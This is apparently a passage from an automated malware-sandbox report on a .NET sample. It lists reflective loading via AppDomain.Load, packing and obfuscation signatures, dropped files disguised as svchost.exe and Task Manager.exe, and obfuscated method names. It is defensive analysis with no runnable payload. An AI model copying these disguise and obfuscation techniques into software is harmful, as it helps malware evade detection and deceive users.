Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: _39Q7vAgcOlnDUc9q41DbPZu6C8vOOn39uj7dSMPoLNvq9LfNQPCeUFq4cK4n6o2aDgjbt System.AppDomain.Load(byte[])
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: KerdCCxFCvA System.AppDomain.Load(byte[])
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: KerdCCxFCvA
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: _39Q7vAgcOlnDUc9q41DbPZu6C8vOOn39uj7dSMPoLNvq9LfNQPCeUFq4cK4n6o2aDgjbt System.AppDomain.Load(byte[])
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: KerdCCxFCvA System.AppDomain.Load(byte[])
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: KerdCCxFCvA
Source: Task Manager.exe.2.dr, dIQI3NYLguO.cs .Net Code: oOOMGaeCsXN System.AppDomain.Load(byte[])
Source: Task Manager.exe.2.dr, dIQI3NYLguO.cs .Net Code: _7sdQawsEDgN System.AppDomain.Load(byte[])
Source: Task Manager.exe.2.dr, dIQI3NYLguO.cs .Net Code: _7sdQawsEDgN
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Code function: 0_2_00007FFD347A00BD pushad ; iretd 0_2_00007FFD347A00C1
Source: C:\Users\user\AppData\Roaming\All function.cmd Code function: 2_2_00007FFD347700BD pushad ; iretd 2_2_00007FFD347700C1
Source: C:\Users\user\AppData\Roaming\All function.exe Code function: 5_2_00007FFD347800BD pushad ; iretd 5_2_00007FFD347800C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD3464D2A5 pushad ; iretd 8_2_00007FFD3464D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD34832316 push 8B485F95h; iretd 8_2_00007FFD3483231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD3468D2A5 pushad ; iretd 10_2_00007FFD3468D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD34872316 push 8B485F91h; iretd 10_2_00007FFD3487231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFD3467D2A5 pushad ; iretd 12_2_00007FFD3467D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFD34862316 push 8B485F92h; iretd 12_2_00007FFD3486231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FFD3466D2A5 pushad ; iretd 16_2_00007FFD3466D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FFD3478097D push E95A22D0h; ret 16_2_00007FFD347809C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FFD3478C2C5 push ebx; iretd 16_2_00007FFD3478C2DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FFD34852316 push 8B485F93h; iretd 16_2_00007FFD3485231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD3465D2A5 pushad ; iretd 19_2_00007FFD3465D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD348476F2 push eax; ret 19_2_00007FFD348476F3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34840912 push eax; ret 19_2_00007FFD34840913
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34847512 push eax; ret 19_2_00007FFD34847513
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34842316 push 8B485F94h; iretd 19_2_00007FFD3484231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD3484011A push eax; ret 19_2_00007FFD3484011B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34842D32 push eax; ret 19_2_00007FFD34842D33
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34840D59 push eax; ret 19_2_00007FFD34840D93
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34840542 push eax; ret 19_2_00007FFD34840543
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34840062 push eax; ret 19_2_00007FFD34840063
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34841292 push eax; ret 19_2_00007FFD34841293
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD348480BE push edx; ret 19_2_00007FFD348480D3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34843A12 push eax; ret 19_2_00007FFD34843A13
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD3484001A push eax; ret 19_2_00007FFD3484001B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34840002 push eax; ret 19_2_00007FFD34840003
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34845425 push eax; ret 19_2_00007FFD3484543B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34848A5A push eax; ret 19_2_00007FFD34848A5B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD3484225A push eax; ret 19_2_00007FFD3484225B
Source: dLRcE11Dkl.exe Static PE information: section name: .text entropy: 7.969273400624172
Source: All function.cmd.0.dr Static PE information: section name: .text entropy: 7.995521906741566
Source: dLRcE11Dkl.exe, Wigvk0CbYCVCKiwdQW7pvcTwDKYA740FwRxw5uTWiZdauz4qml.cs High entropy of concatenated method names: 'M9BHlu5LJtRCf1kNofXhvDiLOjGFLWYUaKOalsOwnCCUAepP7S', 'dnggex9uIaywBnMo9rUewUBai7sNT9h5mtmmeeqyfuINWJHRmW', 'lWzREqENw1J7hhTTP1M8SjDHvx32aSjhMFcemIyj4k5OjhEeyv', 'f95PQh9vQ74P3DWVnE30fMdFKPJWBfMw4rKbobHWxmTZXOYLRA', 'ml0Ks3eqMu8ItHP3aSryboH6EAiomvyA34Sb9XxUwOV4ijv0k9', 'YalRTB4iCEgjhN5JBg2tpZqRlNPO3gClsZ0PpQTLxCPmwDBZhc', '_1hFjBPenbWwKRqBqSRVsq7yLBsy8WV3ZgXfOrudOpsWMwtehle', 'WESRuSg4E3Uf2vyGCJRxGhQ3gY6sUFiRxvZapE2P58EzXnU6HE', 'utWa9gSlU06Qm7sbv4i8V6Tsy2ZtsRcZ0Zw5gDQsBXidzRQrcB', 'wOX6cBMcxb10iVN8Os2RrMJ1ESdgxQVyicloV1WpBZpkMWDoEf'
Source: dLRcE11Dkl.exe, 6FT7pE2wXqrYGPQa5MburPYyRmNPNPPwVDp1YBiWSFAnBDFvbQLd8xV9pUDrBUnRQ.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_8cdoYEV0nSaEV3a77d4peiLOfniaAJn9mYrZAVg0t01gkWc4bD', 'oB5hYg9aasO6ZLLU65yA6jffnyK5QsrFtDHthSmxTvIFOqowb6', 'KhAvRvlHWlN6PggG5e1NdFL2Fijtt8WfuO1Yiau3FsBlN0Qf9t', 'MHFd59bevbEUYfdVzZzqAEqTsd1AaKQbWvXn0P2rGPBAezspoc'
Source: svchost.exe.0.dr, H1K69lOkhiGBu3la6nan80U4LR1WK.cs High entropy of concatenated method names: '_0ylp6SRbhmKDpUb6I0Kqb33BN7GLg', 'e0Q6TObz1WeQKOYCdVxLLWSpEUYyd', 'nC48wPKArcmBP9kQVdn9XpDQwJFW2', 'fXgt3aLLu9xwgJ0a', 'bb8z3iAXrpos2HMM', 'RMFezPF540twUz7T', 'M9IczEPYs44QS6m2', 'nAEglIHWoMewuYtJ', '_7PzetYBuHoMdD08L', 'PbtyrzW9gViGzp9T'
Source: svchost.exe.0.dr, bwR3VWEWBCLSgcxWw04.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'C01Yw7zFklP1W3Wb0Qmut4yA', 'DU7GaDcIDccKilatvYi8rRTc', 'qYyk8VShLsjAjmNpNdNB1O7O', 'M5Hiff95zfiEOtqNcGb3tsVo'
Source: svchost.exe.0.dr, fW2WLGfmndzJprnieEtbylrfBwXbKwEvnMwuAsawnSCUWXBRij2.cs High entropy of concatenated method names: 'jmVFMo0RDrLrDStp2SDsqnphJEzaa6YQaFvxY3b7kIycCxGP0Fg', 'UvXq7CfcH0lgjlZXj5DQfy0nN7atXiFWGhL1zZKKds7DNrstXnS', '_8HS1YcDyslLlLdOvdFFuLVCMzrUCCvS1tYzMh6fZwFjNWu9Ctid', 'p3tjrY1jC7WXvMbdd0VkI8IGPIxpylb91RKKGr6YyccPds24yj3', 'ZuqEsiGetiCqUjcrS8c1r4WJe1JxX9pFBMuIZ48E0Yp5YBqimM6', 'XxEjoPP1kE2IbfDVWintgN1tHnZWXbNjdvNeVELhVGKleEIgq8T', 'CnnBlzFG633w5vomaVnA11VEWfS5I3qT9AWp8uExFqB29VTmjlozSsOXeuJXCy2U0lMGOb7SoLoBpAFq0Nl', '_5EHqDOA3f4vYXoHfWJHDlvC64NA0nB2P1j717fNXXaS6vAsWo1eUR2SSHTre99ePKC2fA3AnEzeUkCWEvKW', '_3mbOw3lfTSEh6hrCcGHSYMJfIMXoEVvedl609Q0D8iILldCOtFScmPKHncn1rti735TCvvGasyNaMtuJsTX', 'rYTj9wVJGd1IG5f5Z83BgJlf4C8xJXVSyZCBXzEadw97yNNppIDA6hrZg65B5iTuBdwIzVO222I9c9GC9OI'
Source: svchost.exe.0.dr, 5QxGXOnu1Vu.cs High entropy of concatenated method names: 'ZUmA9AKjBeO', 'rFKuEFdmCG6', '_4iD9k9dtpjW', 'xgOcwESPQvs', 'My9jWLAr2h9Ns1kx', 'u2tVS7jCkpLPkQni', 'YsctovZbYjVTkzHi', 'FlbIZZ0VdBuq6Pk1', 'aIPHhF7DhnPAUmc1', '_76WXB5wcdw36hZxp'
Source: svchost.exe.0.dr, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs High entropy of concatenated method names: '_3hjvAzXg774SaUtaKUczhVvSuFKy2GFfBHpYG6EQnxSAC2gbzt4AF9zG7fv7FBkv1o56M', '_39Q7vAgcOlnDUc9q41DbPZu6C8vOOn39uj7dSMPoLNvq9LfNQPCeUFq4cK4n6o2aDgjbt', 'RnJS3R7jeAvcA7EXetG0GVunx1tJoFMkrJyCNpaWQ9rFvt2VNk3okmR35Qmmt2PX2jLHp', 'Zr7uexCTfkC', 'QNwzYwVRo8E', '_7YNDsIAiIVd', 'UHYKkYvNKob', 'mUitWho72qX', 'TLSmuX2k5BT', 'Z7mB1QLXQuc'
Source: svchost.exe.0.dr, IAdtlBkckGw.cs High entropy of concatenated method names: 'jXJ8BklWaL8', 'MXXZjToIZhM', 'k7UjaOg1l9S', 'Z9be0Xy3nJi', '_0iG5j6gtCc3', '_8GlEDjNk4mC', 'EpdwBRxA7h1', 'WZXfRdzwArm', 'jHlwA1Sq4KV', 'P7GUgKDeDmnZ9aZMUsa89TZqxcojqkNrWAcxiFWcnbnX0aFsAvVok7bWLtKG2uFQxBTdYOERGApDW6Dpwc14Hc'
Source: svchost.exe.0.dr, 4CJBoxrumcU.cs High entropy of concatenated method names: 'VxTNNO1DouY', 'souyBaKgyRr6RJHPQNNG0VfI8gwfPV1IEkFHzbhbGqFljpVZndnQXG7clz2Rj1yEsbTkXrcR2', '_26RMn0yK7NPYQMFntjeMYQIDUUxJEJI5TRQWj9QmA9hcmI25KYRhPpPSvsFHpgajqbjiJbb37', 'gelsDLzd44KozKIWO9I9csnXPiTuGT5uEP8xF1O3NdnSg4VcLiCbyZQFhS6jK31gK22SUL3dM', 'Cx8Hg7bhyIBJXFji4bQT5tEBW6UhxOhijJDUvfq7htobXi2RW9rCiXqLHrT0juv7V3EYYWx33'
Source: svchost.exe.0.dr, taLg97lfy9j.cs High entropy of concatenated method names: 'KSryC3ndPZ3', 'PJZL9kM9l3m', '_7wyHeBtnYOJ', 'oqEaIUXiNd8', '_7TNi93bOAWr', 'J5fpmWy5gmD', 'oBuLgGKZJb0', 'blvxNrYhroK', 'FkQ7Iemi4Dx', '_9ik0w00Y9nd'
Source: svchost.exe.0.dr, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.cs High entropy of concatenated method names: 'oE4BLKkOJwJkhBs65QJpSDo8Md5CDAuZjc4WUEcxAfIOG23UBIaTCapleYZUKnLiMkbPMXxOI7PKPu2j9h3', 'N9oUI9mYXALciZoMZLlVV0tmvGYoUbkCuVuGZnI6tt3jqiR1CaAJvjbbU1vOTBGRVA80M0NW161PHQPFBWn', 'aUJok4hcYvsDPNQPmoAXSl6x3U0NEPPoLVH2cbndji0p9jfmIdDCSDse3HJZDg8oKnZJ3HFvPyo44QdL8Kw', 'R9VTw5Ow3ZrUixgXN4ty3GtrMHbKL0Qowe6VrLGgHXXnAQ80DTplv6LxWtYNmXENyTVP3JtltPNtVHkZXX3', 'j0zQrveLMiqSu7zMH9Our65UmlUYlqoBubCZOWDuamjeD6KqqAFMPJ95TCoWZLGCvyeeRlcP3hh59v4freS', '_8L5CgH0C23VRbMthP7Jf7kSrJ9glQcqMYhryJARUsflrpbpE4tjHVATY8vkfZcNwLTIzxmF6MNwHabAbKk0', 'zjteIiYZBCEUIfZALIIk3d7hDv65uKfuC8nAEC1T1CBPTBINCMoVJ4RLQAiyO7ZsVxkVDitgTfckEJSNLPx', 'cMcUuo0NeXcTC220n6asyoSddKOoINnXTXV9AqWmQcDlAwC8WzEdAqYNoZUoS745k2J4j', 'uxa5ikT1ZUIZdE6i6ERAWl1k81qclTsBai1NJ4agQeOPiM4PejGIEKTD5mIId5kNWkrjT', 'Y3bSF2JcUm79bs6HNJfk1SrdYfsj8C9B0hXA1iccUgOPOqUEtaRaOQKBDqT3LCBSy2tba'
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, H1K69lOkhiGBu3la6nan80U4LR1WK.cs High entropy of concatenated method names: '_0ylp6SRbhmKDpUb6I0Kqb33BN7GLg', 'e0Q6TObz1WeQKOYCdVxLLWSpEUYyd', 'nC48wPKArcmBP9kQVdn9XpDQwJFW2', 'fXgt3aLLu9xwgJ0a', 'bb8z3iAXrpos2HMM', 'RMFezPF540twUz7T', 'M9IczEPYs44QS6m2', 'nAEglIHWoMewuYtJ', '_7PzetYBuHoMdD08L', 'PbtyrzW9gViGzp9T'
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, bwR3VWEWBCLSgcxWw04.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'C01Yw7zFklP1W3Wb0Qmut4yA', 'DU7GaDcIDccKilatvYi8rRTc', 'qYyk8VShLsjAjmNpNdNB1O7O', 'M5Hiff95zfiEOtqNcGb3tsVo'
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, fW2WLGfmndzJprnieEtbylrfBwXbKwEvnMwuAsawnSCUWXBRij2.cs High entropy of concatenated method names: 'jmVFMo0RDrLrDStp2SDsqnphJEzaa6YQaFvxY3b7kIycCxGP0Fg', 'UvXq7CfcH0lgjlZXj5DQfy0nN7atXiFWGhL1zZKKds7DNrstXnS', '_8HS1YcDyslLlLdOvdFFuLVCMzrUCCvS1tYzMh6fZwFjNWu9Ctid', 'p3tjrY1jC7WXvMbdd0VkI8IGPIxpylb91RKKGr6YyccPds24yj3', 'ZuqEsiGetiCqUjcrS8c1r4WJe1JxX9pFBMuIZ48E0Yp5YBqimM6', 'XxEjoPP1kE2IbfDVWintgN1tHnZWXbNjdvNeVELhVGKleEIgq8T', 'CnnBlzFG633w5vomaVnA11VEWfS5I3qT9AWp8uExFqB29VTmjlozSsOXeuJXCy2U0lMGOb7SoLoBpAFq0Nl', '_5EHqDOA3f4vYXoHfWJHDlvC64NA0nB2P1j717fNXXaS6vAsWo1eUR2SSHTre99ePKC2fA3AnEzeUkCWEvKW', '_3mbOw3lfTSEh6hrCcGHSYMJfIMXoEVvedl609Q0D8iILldCOtFScmPKHncn1rti735TCvvGasyNaMtuJsTX', 'rYTj9wVJGd1IG5f5Z83BgJlf4C8xJXVSyZCBXzEadw97yNNppIDA6hrZg65B5iTuBdwIzVO222I9c9GC9OI'
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, 5QxGXOnu1Vu.cs High entropy of concatenated method names: 'ZUmA9AKjBeO', 'rFKuEFdmCG6', '_4iD9k9dtpjW', 'xgOcwESPQvs', 'My9jWLAr2h9Ns1kx', 'u2tVS7jCkpLPkQni', 'YsctovZbYjVTkzHi', 'FlbIZZ0VdBuq6Pk1', 'aIPHhF7DhnPAUmc1', '_76WXB5wcdw36hZxp'
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs High entropy of concatenated method names: '_3hjvAzXg774SaUtaKUczhVvSuFKy2GFfBHpYG6EQnxSAC2gbzt4AF9zG7fv7FBkv1o56M', '_39Q7vAgcOlnDUc9q41DbPZu6C8vOOn39uj7dSMPoLNvq9LfNQPCeUFq4cK4n6o2aDgjbt', 'RnJS3R7jeAvcA7EXetG0GVunx1tJoFMkrJyCNpaWQ9rFvt2VNk3okmR35Qmmt2PX2jLHp', 'Zr7uexCTfkC', 'QNwzYwVRo8E', '_7YNDsIAiIVd', 'UHYKkYvNKob', 'mUitWho72qX', 'TLSmuX2k5BT', 'Z7mB1QLXQuc'
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, IAdtlBkckGw.cs High entropy of concatenated method names: 'jXJ8BklWaL8', 'MXXZjToIZhM', 'k7UjaOg1l9S', 'Z9be0Xy3nJi', '_0iG5j6gtCc3', '_8GlEDjNk4mC', 'EpdwBRxA7h1', 'WZXfRdzwArm', 'jHlwA1Sq4KV', 'P7GUgKDeDmnZ9aZMUsa89TZqxcojqkNrWAcxiFWcnbnX0aFsAvVok7bWLtKG2uFQxBTdYOERGApDW6Dpwc14Hc'
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, 4CJBoxrumcU.cs High entropy of concatenated method names: 'VxTNNO1DouY', 'souyBaKgyRr6RJHPQNNG0VfI8gwfPV1IEkFHzbhbGqFljpVZndnQXG7clz2Rj1yEsbTkXrcR2', '_26RMn0yK7NPYQMFntjeMYQIDUUxJEJI5TRQWj9QmA9hcmI25KYRhPpPSvsFHpgajqbjiJbb37', 'gelsDLzd44KozKIWO9I9csnXPiTuGT5uEP8xF1O3NdnSg4VcLiCbyZQFhS6jK31gK22SUL3dM', 'Cx8Hg7bhyIBJXFji4bQT5tEBW6UhxOhijJDUvfq7htobXi2RW9rCiXqLHrT0juv7V3EYYWx33'
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, taLg97lfy9j.cs High entropy of concatenated method names: 'KSryC3ndPZ3', 'PJZL9kM9l3m', '_7wyHeBtnYOJ', 'oqEaIUXiNd8', '_7TNi93bOAWr', 'J5fpmWy5gmD', 'oBuLgGKZJb0', 'blvxNrYhroK', 'FkQ7Iemi4Dx', '_9ik0w00Y9nd'
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.cs High entropy of concatenated method names: 'oE4BLKkOJwJkhBs65QJpSDo8Md5CDAuZjc4WUEcxAfIOG23UBIaTCapleYZUKnLiMkbPMXxOI7PKPu2j9h3', 'N9oUI9mYXALciZoMZLlVV0tmvGYoUbkCuVuGZnI6tt3jqiR1CaAJvjbbU1vOTBGRVA80M0NW161PHQPFBWn', 'aUJok4hcYvsDPNQPmoAXSl6x3U0NEPPoLVH2cbndji0p9jfmIdDCSDse3HJZDg8oKnZJ3HFvPyo44QdL8Kw', 'R9VTw5Ow3ZrUixgXN4ty3GtrMHbKL0Qowe6VrLGgHXXnAQ80DTplv6LxWtYNmXENyTVP3JtltPNtVHkZXX3', 'j0zQrveLMiqSu7zMH9Our65UmlUYlqoBubCZOWDuamjeD6KqqAFMPJ95TCoWZLGCvyeeRlcP3hh59v4freS', '_8L5CgH0C23VRbMthP7Jf7kSrJ9glQcqMYhryJARUsflrpbpE4tjHVATY8vkfZcNwLTIzxmF6MNwHabAbKk0', 'zjteIiYZBCEUIfZALIIk3d7hDv65uKfuC8nAEC1T1CBPTBINCMoVJ4RLQAiyO7ZsVxkVDitgTfckEJSNLPx', 'cMcUuo0NeXcTC220n6asyoSddKOoINnXTXV9AqWmQcDlAwC8WzEdAqYNoZUoS745k2J4j', 'uxa5ikT1ZUIZdE6i6ERAWl1k81qclTsBai1NJ4agQeOPiM4PejGIEKTD5mIId5kNWkrjT', 'Y3bSF2JcUm79bs6HNJfk1SrdYfsj8C9B0hXA1iccUgOPOqUEtaRaOQKBDqT3LCBSy2tba'
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, H1K69lOkhiGBu3la6nan80U4LR1WK.cs High entropy of concatenated method names: '_0ylp6SRbhmKDpUb6I0Kqb33BN7GLg', 'e0Q6TObz1WeQKOYCdVxLLWSpEUYyd', 'nC48wPKArcmBP9kQVdn9XpDQwJFW2', 'fXgt3aLLu9xwgJ0a', 'bb8z3iAXrpos2HMM', 'RMFezPF540twUz7T', 'M9IczEPYs44QS6m2', 'nAEglIHWoMewuYtJ', '_7PzetYBuHoMdD08L', 'PbtyrzW9gViGzp9T'
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, bwR3VWEWBCLSgcxWw04.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'C01Yw7zFklP1W3Wb0Qmut4yA', 'DU7GaDcIDccKilatvYi8rRTc', 'qYyk8VShLsjAjmNpNdNB1O7O', 'M5Hiff95zfiEOtqNcGb3tsVo'
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, fW2WLGfmndzJprnieEtbylrfBwXbKwEvnMwuAsawnSCUWXBRij2.cs High entropy of concatenated method names: 'jmVFMo0RDrLrDStp2SDsqnphJEzaa6YQaFvxY3b7kIycCxGP0Fg', 'UvXq7CfcH0lgjlZXj5DQfy0nN7atXiFWGhL1zZKKds7DNrstXnS', '_8HS1YcDyslLlLdOvdFFuLVCMzrUCCvS1tYzMh6fZwFjNWu9Ctid', 'p3tjrY1jC7WXvMbdd0VkI8IGPIxpylb91RKKGr6YyccPds24yj3', 'ZuqEsiGetiCqUjcrS8c1r4WJe1JxX9pFBMuIZ48E0Yp5YBqimM6', 'XxEjoPP1kE2IbfDVWintgN1tHnZWXbNjdvNeVELhVGKleEIgq8T', 'CnnBlzFG633w5vomaVnA11VEWfS5I3qT9AWp8uExFqB29VTmjlozSsOXeuJXCy2U0lMGOb7SoLoBpAFq0Nl', '_5EHqDOA3f4vYXoHfWJHDlvC64NA0nB2P1j717fNXXaS6vAsWo1eUR2SSHTre99ePKC2fA3AnEzeUkCWEvKW', '_3mbOw3lfTSEh6hrCcGHSYMJfIMXoEVvedl609Q0D8iILldCOtFScmPKHncn1rti735TCvvGasyNaMtuJsTX', 'rYTj9wVJGd1IG5f5Z83BgJlf4C8xJXVSyZCBXzEadw97yNNppIDA6hrZg65B5iTuBdwIzVO222I9c9GC9OI'
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, 5QxGXOnu1Vu.cs High entropy of concatenated method names: 'ZUmA9AKjBeO', 'rFKuEFdmCG6', '_4iD9k9dtpjW', 'xgOcwESPQvs', 'My9jWLAr2h9Ns1kx', 'u2tVS7jCkpLPkQni', 'YsctovZbYjVTkzHi', 'FlbIZZ0VdBuq6Pk1', 'aIPHhF7DhnPAUmc1', '_76WXB5wcdw36hZxp'
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs High entropy of concatenated method names: '_3hjvAzXg774SaUtaKUczhVvSuFKy2GFfBHpYG6EQnxSAC2gbzt4AF9zG7fv7FBkv1o56M', '_39Q7vAgcOlnDUc9q41DbPZu6C8vOOn39uj7dSMPoLNvq9LfNQPCeUFq4cK4n6o2aDgjbt', 'RnJS3R7jeAvcA7EXetG0GVunx1tJoFMkrJyCNpaWQ9rFvt2VNk3okmR35Qmmt2PX2jLHp', 'Zr7uexCTfkC', 'QNwzYwVRo8E', '_7YNDsIAiIVd', 'UHYKkYvNKob', 'mUitWho72qX', 'TLSmuX2k5BT', 'Z7mB1QLXQuc'
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, IAdtlBkckGw.cs High entropy of concatenated method names: 'jXJ8BklWaL8', 'MXXZjToIZhM', 'k7UjaOg1l9S', 'Z9be0Xy3nJi', '_0iG5j6gtCc3', '_8GlEDjNk4mC', 'EpdwBRxA7h1', 'WZXfRdzwArm', 'jHlwA1Sq4KV', 'P7GUgKDeDmnZ9aZMUsa89TZqxcojqkNrWAcxiFWcnbnX0aFsAvVok7bWLtKG2uFQxBTdYOERGApDW6Dpwc14Hc'
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, 4CJBoxrumcU.cs High entropy of concatenated method names: 'VxTNNO1DouY', 'souyBaKgyRr6RJHPQNNG0VfI8gwfPV1IEkFHzbhbGqFljpVZndnQXG7clz2Rj1yEsbTkXrcR2', '_26RMn0yK7NPYQMFntjeMYQIDUUxJEJI5TRQWj9QmA9hcmI25KYRhPpPSvsFHpgajqbjiJbb37', 'gelsDLzd44KozKIWO9I9csnXPiTuGT5uEP8xF1O3NdnSg4VcLiCbyZQFhS6jK31gK22SUL3dM', 'Cx8Hg7bhyIBJXFji4bQT5tEBW6UhxOhijJDUvfq7htobXi2RW9rCiXqLHrT0juv7V3EYYWx33'
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, taLg97lfy9j.cs High entropy of concatenated method names: 'KSryC3ndPZ3', 'PJZL9kM9l3m', '_7wyHeBtnYOJ', 'oqEaIUXiNd8', '_7TNi93bOAWr', 'J5fpmWy5gmD', 'oBuLgGKZJb0', 'blvxNrYhroK', 'FkQ7Iemi4Dx', '_9ik0w00Y9nd'
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.cs High entropy of concatenated method names: 'oE4BLKkOJwJkhBs65QJpSDo8Md5CDAuZjc4WUEcxAfIOG23UBIaTCapleYZUKnLiMkbPMXxOI7PKPu2j9h3', 'N9oUI9mYXALciZoMZLlVV0tmvGYoUbkCuVuGZnI6tt3jqiR1CaAJvjbbU1vOTBGRVA80M0NW161PHQPFBWn', 'aUJok4hcYvsDPNQPmoAXSl6x3U0NEPPoLVH2cbndji0p9jfmIdDCSDse3HJZDg8oKnZJ3HFvPyo44QdL8Kw', 'R9VTw5Ow3ZrUixgXN4ty3GtrMHbKL0Qowe6VrLGgHXXnAQ80DTplv6LxWtYNmXENyTVP3JtltPNtVHkZXX3', 'j0zQrveLMiqSu7zMH9Our65UmlUYlqoBubCZOWDuamjeD6KqqAFMPJ95TCoWZLGCvyeeRlcP3hh59v4freS', '_8L5CgH0C23VRbMthP7Jf7kSrJ9glQcqMYhryJARUsflrpbpE4tjHVATY8vkfZcNwLTIzxmF6MNwHabAbKk0', 'zjteIiYZBCEUIfZALIIk3d7hDv65uKfuC8nAEC1T1CBPTBINCMoVJ4RLQAiyO7ZsVxkVDitgTfckEJSNLPx', 